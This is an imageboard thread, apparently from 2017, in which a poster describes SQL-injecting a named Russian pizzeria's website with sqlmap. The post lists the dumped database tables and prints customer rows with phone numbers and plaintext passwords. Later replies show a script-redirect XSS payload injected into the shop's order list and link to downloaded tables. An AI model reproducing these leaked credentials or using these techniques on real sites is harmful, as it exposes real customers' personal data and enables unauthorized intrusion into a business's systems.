Включить каку
1chan.ca

Вижу 7! Всего сегодня было 1639.
За день постов — 29, скорость ~11 п/ч. 13

Онлайн ссылки

К подробному списку →
Скрыть панель

Первый канал

Общение


Discord-конференция
(новая ссылка)
Telegram-конференция
(новая ссылка)
Поиск записей | Категории | Последние комментарии
К непрочитанным комментариям
Новости интернета

http://pizza46.ru/razd.php?…
И вся инфа их покупателей по сути лежит в открытом виде. После этой на

http://pizza46.ru/razd.php?…
И вся инфа их покупателей по сути лежит в открытом виде. После этой найденной хуйни я всегда чекаю sqlmap'ом сайты, откуда собираюсь что-то заказывать.

http://pizza46.ru/admin — это они закрыли и теперь туда никакой пароль из БД не подходит. А здесь http://pizza46.ru/enter.php?… никакого профита нет.

А ещё там xss есть, везде. Можно отправить им, например, в список заказов редирект, и все работники переадресуются туда, куда вы укажите. И куки так спиздить можно, но какой смысл, если админка закрыта и видимо доступ теперь только для определенных ипов.

Database: host1410786_pizz
[16 tables]
+---------------------------------------+
| akcion                                |
| bonusy                                |
| comment                               |
| doptype                               |
| galary                                |
| izbran                                |
| menu                                  |
| nachinky                              |
| news                                  |
| options                               |
| otz                                   |
| pizzacat                              |
| promo                                 |
| sousy                                 |
| users                                 |
| zakazy                                |
+---------------------------------------+

Причем данные там хранятся в незашифрованном виде.

Пруф:

id_u,tel_u,pass_u,name_u,role_u,email_u,date_reg_u,ORDER_PROP_5,ORDER_PROP_7,ORDER_PROP_6,ORDER_PROP_13,ORDER_PROP_15,ORDER_PROP_611
1,vk.com/instead_of_cloud,121314aa,vk.com/instead_of_cloud,1,vk.com/instead_of_cloud
39,89510877601,121314aa,Илья,0,[email protected]
51,<blank>,1234,Илья,1,[email protected]
52,<blank>,12345678,Илья,1,[email protected]
472294,89207381476,59753zeracuQ,Артём,1,[email protected],1454697812

Судя по vk.com/instead_of_clou­d — это вставил прошлый «хакер» и их ебут уже не в первый раз. Всегда проверяйте сайты, куда вы вводите личные данные, тем более всякие пиццерии, sqlmap'ом:
http://sqlmap.org/
https://github.com/…p/wiki/Usage

334952 | 5 | 01 Марта 2017 @ 23:41:43 | №334952 Добавить комментарий
01 Марта 2017 @ 23:43:33, 334955 334955 334955

Сру + ссу тебе на пиццу.

01 Марта 2017 @ 23:44:49, 334956 334956 334956 
""Имя"";s:106:""Ирина""><script>window.location = ""https://1chan.ca/news/all/"";</script>"

Им даже похуй на это, они всё равно принимают заказы, видимо уже без жаваскрипта включенного, лол.

01 Марта 2017 @ 23:45:01, 334957 334957 334957

В какой жопе мира находится эта пиццерия? Стульщека, ты наверное и суши от Хуюши заказываешь.

01 Марта 2017 @ 23:45:18, 334958 334958 334958

>>334957
У них заказов всё равно дохуя каждый день.

01 Марта 2017 @ 23:46:07, 334959 334959 334959

>>334958
Империю пиццы хакни.

01 Марта 2017 @ 23:46:52, 334960 334960 334960

Вот две таблицы:
http://rgho.st/6CgWl4hLP
http://rgho.st/8ts7mqTHM

01 Марта 2017 @ 23:55:54, 334961 334961 334961

Ебать ты хакер, Стульщека, сможешь хакнуть мою ширинку?

01 Марта 2017 @ 23:58:10, 334962 334962 334962

>>334961
Хак-хак :3

01 Марта 2017 @ 23:58:40, 334963 334963 334963

>>334962
Вау, ты супер хакер!

Читают: 1 | Отвечают: 0 Всего: 276 просмотров
Комментировать: Правила разметки

(← + Сtrl) вернуться назадк новым сообщениям (Сtrl + →)

Одобренные | Все

При копировании материалов ни в коем
случае не давать ссылку на 1chan.ca